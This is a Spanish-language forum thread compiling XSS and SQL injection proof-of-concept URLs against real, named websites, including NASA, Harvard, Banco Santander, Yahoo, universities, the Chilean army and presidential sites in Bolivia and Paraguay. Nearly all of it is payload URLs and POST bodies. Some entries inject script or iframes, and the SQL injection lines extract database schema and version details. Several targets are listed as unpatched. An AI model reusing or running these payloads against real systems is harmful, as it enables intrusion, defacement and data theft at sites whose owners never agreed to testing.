Recopilatorio de Vulnerabilidades de XSS/SQLinjection
WHK:
Antes que nada hay que decir que todos los administradores de estos sitios webs fueron avisados de sus multiples fallas para que pudiesen ser corregidas antes de ser expuestas, solo un webmaster respondió y fue webtaller, el resto la mayoría los reparó solo en parte. esto es para tener un poco de consiencia al momento de crear un sitio web o manetener uno de que esto de la seguridad web no es algo para tomar a la ligera, antiguamente un xss era considerado de bajo riesgo pero con el tiempo ya se ha considerado medio alto dependiendo del caso ya que puedes no causar nada como la obtensión de privilegios de administración en los mismos sitios.
Ninguna web fue afectada.
Descubridor: todas por WHK.
La Nasa
Código:
http://mynasa.nasa.gov/portal/site/mynasa/template.'"><h1>XSS
La Nasa nuevamente
Código:
http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param=%68%74%74%70%3A%2F%2F%77%77%77%2E%6A%63%63%68%61%72%72%79%2E%63%6F%6D%2F%70%72%75%65%62%61%73%2F%6E%61%73%61%2E%67%6F%76%2F%77%68%6B%2E%61%73%78
MTV
Código:
http://www.mtvla.com/news/droplets/email_story_form.jhtml?title="><h1>XSS
Defcon
Código:
https://pics.defcon.org/misc.php?action=cookies
Editas tu cookie bbsessionhash:%3Ch1%3EXSS+by+WHK%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E
Telefónica
Código:
http://195.53.169.41/jsp/CDoResult.jsp?QUERYTYPE=32&QUERYTXT=lol&QUERYLEVEL=2&SESION=a';}%3C/script%3E%3Ch1%3EXSS%20by%20WHK%3Cscript%3E%3C!–&NOMLIB=tel_chile_lib|grupo_tel_chile_lib|salaprensa_lib&QUERYSTRING=&IDIOM=&FILEINI=default_cl&SALADEPRENSA=&PAIS=CL
Foros Terra
Código:
http://foros.terra.com.mx/portada.cfm?s=F&pCat=11"><br><br><br><h1>XSS
Descargas Terra
Código:
http://descargas.terra.es/index.phtml?&action=all&id_section=1"><script>alert(1) ;</script>&search="><br><h1>XSS
Simantec (de Norton Antivirus)
Código:
http://www.symantecstore.com/dr/v2/ec_main.entry25?page= ESUpgradeRenewal&client=Symantec&sid=41185&cid=2073aaaa"><br><br><br><h1>XSS%20by%20WHK<br><br><br>
Esest (de Nod32 Antivirus)
Código:
http://www.nod32.bg/ (en el buscador de arriba poner "><h1>XSS )
Infosecurityevent
Código:
http://www.infosecurityevent.com/App/homepage.cfm?keywords=%22%3E%3Ch1%3EXSS+by+WHK%3Cbr%3E%3C%2Fh1%3E&appname=100004&moduleid=42&siteadvsearch=1&collections=1%2C2%2C3%2C4%2C5%2C6%2C9&searchtype=all&displaytype=relevance&searchmethod=basic&fuseaction=search.results&go.x=14&go.y=8
Megaupload
Código:
http://www.megaupload.com/signup/es/index.php (petición POST al valor 'email' "><h1>XSS )
Winamp
Código:
http://www.winamp.com/skins/search/?s=m&q=;"></script><script>alert(/XSS/);</script>
Imageshack
Código:
http://reg.imageshack.us/content.php?page=email&q=abuse2/><h1>XSS
Webtaller
Código:
http://www.webtaller.com/regsystem/login.php?ref=/envios/enviar_articulo.php?id="><h1>XSS
Universidad Surcolombiana (Colombia)
Código:
http://portal.usco.edu.co:8080/portal/portal/pagina.jsp?id=70"><h1>XSS%20by%20WHK<script>alert(/XSS%20by%20WHK/);</script>&index=1"><h1><br>XSS
Universidad de Chile
Código:
http://www.uchile.cl/uchile.portal?_nfpb=true&_pageLabel=not&url=42454"><h1>XSS
Pontificia Universidad Católica de Chile
Código:
http://www.uc.cl/ (donde dice "buscar personas" poner "><h1>XSS )
Universidad Iberoamericana de México
Código:
http://enlinea3.uia.mx/www/busqueda_uia.cfm?busqueda=%22%3E%3Ch1%3EXSS
Universidad de Buenos Aires UBA (Argentina)
Código:
http://www.uba.ar/comunicacion/difusion/agenda/encurso.php?dia=7&mes="><h1>XSS7&?o=2007#4106
Universidade de São Paulo USP (Brasil)
Código:
http://noticias.usp.br/acontece/obterNoticia?codntc=17246&codnucjrn=1"><h1>XSS
Universidad Harvard (Estados Unidos)
Código:
https://www.pin1.harvard.edu/pin/submit-login (en datos poner "><h1>XSS )
Sourceforge
Código:
http://sourceforge.net/search/?type_of_search=soft&words=';"/></script><h1>XSS<script>alert();</script>
Softronic
Código:
http://zonealarm-antivirus.softonic.com/?refmkt=6aaaaa"><script>alert(/XSS by WHK/);</script>
WikiWix (Buscador Wikipedia)
Código:
http://es.wikiwix.com/index.php?action="><h1>XSS<br><br>?=es&bg=es
Nintendo
Código:
http://www.nintendo-europe.com/NOE/es/ES/search/search.jsp?searchText=';}}"></script><h1>XSS<script>alert();</script>&indexName=all
Sony
Código:
http://www.sony.es/search/Search.action?applicationtype=Search&searchtype=product&site=odw_es_ES?ion=es_ES_Search&start=1&page=ProductMultiSiteSearchResult&shortcut=true&query=';</script><script>alert();</script>&locale=es_ES&brand=default&allSections=true
Meanwhile
Código:
http://meanwhile.com/?domain=hackxcrack.com"><h1><br>XSS by WHK<script>&
SPAM(1)
Código:
http://www.SPAM(1)/top/search.php (en el buscador poner "><h1>XSS )
SPAM(3) (elhacker.org)
Código:
http://elhacker.org/ (en el buscador poner "><h1>XSS )
New-Bytes.net
Código:
http://md5.new-bytes.net/encoder.php (donde dice codificar poner '"><h1>XSS )
Codebreak.tk
Código:
http://codebreak.uni.cc/tools/shellcode.php (poner </textarea><h1>XSS )
ElHacker.net
Código:
http://ns2.elhacker.net/cgi-bin/birdcast.cgi (Crear una referencia con contenido HTML incrustado)
Dimitrix
Código:
http://www.dimitrix.es/youtube/ (poner </textarea><h1>XSS )
Piojosoft
Código:
http://www.piojosoft.com/index.php?sección=programas/buscatop&pclaves=<script>alert(/XSS/)</script>
Portalhacker.net
Código:
http://www.portalhacker.net/buscar.php (metodo post a un input llamado query ""><h1>XSS " mas el valor "ok " en el valor "buscar")
DarkNet.org
Código:
http://www.darknet.org/ (metodo GET al input 's' : ""><h1>XSS ")
BlindSec
Código:
http://www.blindsec.com/notes.php (Editar el texto escapando con un '</textarea>' y guardando)
johnny.ihackstuff
Código:
http://johnny.ihackstuff.com/index.php?searchword=';alert('XSS')// &option=com_search&Itemid=5
Las FARC
Código:
http://www.farcep.org/?node=3&op=search&date_range=E+0&search_string=%27%22%3E%3Ch1%3Etest&imageFiel
d.x=0&imageField.y='%22%3E%3Ch1%3Etest0<script>alert(/esto es un problema/);</script>
Universidad DUOC de Chile
Código:
http://mercadolaboral.duoc.cl/alerta.cfm?msg='%22%3E%3Ciframe%20src=http://xssed.com%3E
Zone-H
Código:
http://www.zone-h.org/index.php?searchword=';alert('XSS')//%20&option=com_search&Itemid=5
Banco Santander
Código:
http://www.santander.com/csgs/Satellite?accesibilidad=3&canal=CAccionistas&cid=1147087106975&empr=SA
NCorporativo&leng=es_ES&pagename=SANCorporativo/Page/SC_ContenedorBuscadorGeneral&pagina=99999999999
99999999'"><script>alert(/xss/);</script>
Anonymouse
Código:
http://anonymouse.org/cgi-bin/anon-email.cgi
POST: to=yo%40noexist.fakeeeeee&subject=<script>alert(2)</script>&text=<script>alert(1)</script>
Ejercito de Chile
Código:
http://www.ejercito.cl/busqueda/index.php
POST: PHPSESSID=478a586e7ac990faa11abde01c939ad8&texto=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pub_d esde=&pub_hasta=&contenido=0&image222.x=0&image222.y=0
Yahoo
Código:
http://es.search.yahoo.com/search?p=http%3A%2F%2Fwww.huifa.cl%2Fbuscador%2Fbuscar.php%3F%26cod_rubro
%3D%26cb%3D%26criterio%3D%3C%2Ftitle%3E%3Ch1%3E%3Cmarquee%3Emuajajajaja%3C%2Fmarquee%3E%3C%2Fh1%3E%3
Ctitle%3E&fr=yfp-t-501&ei=UTF-8&meta=vl%3D
Nota: las imagenes las retiré porque utilizaban demasiado espacio, ya las pondré nuevamente pero en miniaturas cuando estén listas.
Fuentes
http://www.jccharry.com/portada/component/content/article/51.html
http://xssed.com/archive/author=whk
Erik#:
Sitio web: www.ipsaportal.unina.it
Descubridor: Erik#
URL del aviso: http://netzeven.wordpress.com/2009/02/10/xss-en-ipsatotal-buscador/
Fecha de descubrimiento: 10.02.09
Fecha de notificación: ---
Fecha de publicación: 10.02.09
Arreglado: No
Información adicional: XSS en buscador
Código:
http://ipsaportal.unina.it/?s=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fwww.krews.es%2Fhackbyerik.png%22%3E&x=0&y=0
Krackwar ™:
Sitio web: http://www.presidencia.gob.bo
Descubridor: N1GHTSCR34M
URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html
Fecha de descubrimiento: 17.02.09
Fecha de notificación: ---
Fecha de publicación: 17.02.09
Arreglado: No
Información adicional:
Código:
http://www.presidencia.gob.bo/prensa/Noticias.asp?id=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27VIEW1%27))
Krackwar ™:
Sitio web: http://www.presidencia.gov.py
Descubridor: N1GHTSCR34M
URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html
Fecha de descubrimiento: 17.02.09
Fecha de notificación: ---
Fecha de publicación: 17.02.09
Arreglado: No
Información adicional:
Código:
http://www.presidencia.gov.py/detalle.asp?codigo=convert(int,(@@Version))
qwertty:
Sitio web: www.fotolog.com
Descubridor: FeDeX
URL del aviso: http://txt.io/t-agZ0eHQtaW9yDwsSB3R4dExpc3QY3aYCDA
Fecha de descubrimiento: Un dia en el año 2008
Fecha de notificación: --
Fecha de publicación: 18/jul/2009
Arreglado: No :)
Información adicional: Sale todo en la URL de aviso..
Navegación
[#] Página Siguiente
[*] Página Anterior